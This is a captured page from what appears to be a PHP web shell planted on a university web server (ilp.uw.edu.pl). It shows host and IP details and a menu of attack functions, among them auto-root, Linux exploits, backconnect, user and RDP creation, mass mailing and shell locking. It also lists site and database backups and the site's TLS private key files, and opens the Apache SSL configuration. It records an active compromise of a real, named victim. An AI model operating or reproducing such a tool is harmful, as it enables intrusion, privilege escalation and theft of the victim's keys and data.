Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 216.73.216.37
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
ifk
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
gp /
ilp /
[ HOME SHELL ]
Name
Size
Permission
Action
2025-12-02_12-58.etc.cpolon.tg...
1.8
MB
-rw-r--r--
2025-12-02_12-58.mysql.ilpnowa...
29.32
MB
-rw-r--r--
2025-12-02_12-58_ilpnowa.tgz
733.04
MB
-rw-r--r--
ilp_uw_edu_pl_2025.key
1.66
KB
-rw-r--r--
ilp_uw_edu_pl_2025.pem
7.38
KB
-rw-r--r--
ilpnowa-ssl.conf
1.28
KB
-rw-r--r--
ilpnowa.conf
1.36
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : ilpnowa-ssl.conf
<IfModule mod_ssl.c> <VirtualHost *:443> ServerName ilp.uw.edu.pl ServerAdmin webmaster@localhost DocumentRoot /home/ilpnowa/web ServerAlias www.ilp.uw.edu.pl <FilesMatch \.php$> # Apache 2.4.10+ can proxy to unix socket #SetHandler "proxy:unix:/var/run/php/php7.0-fpm.sock|fcgi://localhost/" #SetHandler "proxy:unix:/var/run/php/php7.1-fpm.sock|fcgi://localhost/" #SetHandler "proxy:unix:/var/run/php/php7.2-fpm.sock|fcgi://localhost/" #SetHandler "proxy:unix:/var/run/php/php8.2-fpm.sock|fcgi://localhost/" SetHandler "proxy:unix:/var/run/php/php7.4-fpm.sock|fcgi://localhost/" #SetHandler application/x-httpd-php </FilesMatch> <Directory /home/ilpnowa/web/> Options Indexes FollowSymLinks AllowOverride All #AllowOverride None Require all granted DirectoryIndex index.php #Redirect "/" http://ilp.uw.edu.pl/ </Directory> #LogLevel info ssl:warn ErrorLog ${APACHE_LOG_DIR}/error.log CustomLog ${APACHE_LOG_DIR}/access.log combined # Enable/Disable SSL for this virtual host. SSLEngine on SSLCertificateFile /etc/apache2/ssl/ilp_uw_edu_pl_2025.pem SSLCertificateKeyFile /etc/apache2/ssl/ilp_uw_edu_pl_2025.key <FilesMatch "\.(cgi|shtml|phtml|php)$"> SSLOptions +StdEnvVars </FilesMatch> <Directory /usr/lib/cgi-bin> SSLOptions +StdEnvVars </Directory> </VirtualHost> </IfModule>
Close